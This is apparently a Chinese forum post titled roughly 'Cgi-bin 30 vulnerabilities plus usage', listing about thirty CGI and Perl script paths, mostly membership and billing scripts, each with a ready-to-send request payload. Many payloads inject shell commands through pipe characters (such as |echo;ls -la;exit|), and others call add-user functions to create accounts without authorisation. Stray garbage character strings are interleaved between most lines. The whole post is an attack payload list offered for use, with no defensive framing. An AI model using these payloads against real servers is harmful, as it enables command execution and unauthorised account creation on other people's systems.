Cgi-bin 30个漏洞＋使用方法

admin

==============================

9 B, s% G$ k4 E8 `" A/smspass.pl
username=username&password=password

! t5 E6 T3 ~" \  @/index.cgi
% ?: v  u. v! B6 m& @, P. z2 ?wei=ren&gen=command
) `& p" A9 \/ T  Y/ [7 G- v7 W! _
/passmaster.cgi
; y  \( Q# x* ^, tAction=Add&Username=Username&Password=Password
" `$ b0 U$ K( O9 G# y
8 F5 X" a2 B) R& \+ x8 t/accountcreate.cgi
: b  n( ?( L) E/ G' c- M, \username=username&password=password&ref1=|echo;ls|
# L. z; o# ?1 I6 w7 U& J- a9 P
  y: g+ H/ o/ M) R  F/form.cgi
name=xxxx&email=email&subject=xxxx&response=|echo;ls|

/addusr.pl
/cgi-bin/EuroDebit/addusr.pl
: B  R, W! \4 k4 Juser=username&pass=Password&confirm=Password
  B' H0 \% y, ?. G/ Q
7 J3 F6 r5 r" v. m/ccbill-local.asp
post_values=username:password

/count.cgi
$ J& l' |0 k8 v: Z1 W1 C0 U& xpinfile=|echo;ls -la;exit|

7 p) J' n- T7 R, I6 k( f* c: V/ i6 s/recon.cgi
3 t) [! n- n0 d4 j/recon.cgi?search
; k, c3 R8 |+ B" r& n3 {searchoption=1&searchfor=|echo;ls -al;exit|
9 u2 l- K2 Q0 \* ~, I8 M2 @: I
/verotelrum.pl
2 Z, `8 \" }5 R2 y0 f! zvercode=username:password:dseegsow:add:amount<&30>
' Z0 _& K* l; F0 ^5 ~
/af.cgi
_browser_out=|echo;ls -la;exit;|

/modify.cgi
username=username&password=password&expire=30
2 i# g3 K4 c1 L; }
% _/ {. d; T1 V4 w9 w/openjournal.cgi
( t& ~/ r* _# N) u- Q2 y1 Xedit=1&ct=2&go=|echo;ls -al;exit|

/gx9passwd.cgi
0 W0 f9 C2 N! j# dcmd=ADD&user=username&pass=password

/probecontrol.cgi
& e1 Z( `2 Y) g9 `) bcommand=enable&username=username&password=password
2 y( i6 G3 V( }2 s. z
3 Q, E0 ~+ O) [$ W' U" f7 H/recon.cgi
searchoption=3&searchfor=echo;ls -la;exit
+ U& |# p# e! J7 j7 G/ V% x
* X# p6 w( W% r" [/htadd.pl
9 [1 f( _7 P0 C" {( L  m2 D1 {: Uconfigfile=|echo; ls -alt; exit
/ ^* m  u# k1 [$ x! p4 v
0 ?! h) c9 E. X) a/ W) j3 w/gx9passwd.cgi
: t$ m$ w( X+ _$ h; s% Fcmd=ADD&user=username&pass=password
% w" K0 C, a+ e% s) y( ?
/ibill*.pl
6 R2 ~' L8 i0 Y; G' w+ Hreqtype=add&authpwd=authpwd&username=username&password=password

/cpay.cgi
command=add_member&username=username(EMAIL)&password=password(DES)

/globill_ut.cgi
' J, Z% f3 |$ d0 ^. c. Edo=add&username=username&password=password&wpassword=password

/usercontrol.cgi
7 U. z8 h$ R: ~7 r, I0 g+ Icommand=enable&username=USER&password=PASS
! r6 @6 S" p+ Y& C# O4 R
/globoSALErum.cgi
action=ADD&seccode=seccode&login=username&password=password

+ a; f8 h! Y' O1 g8 ?/addusr.pl
user=USER&pass=PASS&confirm=PASS

1 {  \: v  s$ `0 C* r! i/pincount.cgi
5 X2 ~  W- ~% M: r/cgi-bin/mastergate/pincount.cgi
+ R/ m, |; R0 a$ apinfile=|echo;pwd;exit|

, l. x9 G& ~, @4 ]/accountcreate.cgi
/cgi-bin/gateway/accountcreate.cgi
  S- ~9 G7 m2 j7 U2 ?username=username&password=password&password2=password&ref1=|echo;ls -al;exit

5 ]% d& v+ w2 e3 @0 }( G5 G/af.cgi
6 d! I" n! k# g/env.cgi
" x$ x9 b# _; }, h4 aADD+;echo;pwd;exit

- K0 p5 t2 r4 D6 C1 u5 z2 |/count.cgi
pinfile=|echo;pwd;exit|

  q5 x! V5 U% B: M4 ~1 Z* ~/recon.cgi
searchoption=1&searchfor=|echo;ls%20-al;exit|

/add.cgi
username=username&password=password&expire=30

==============================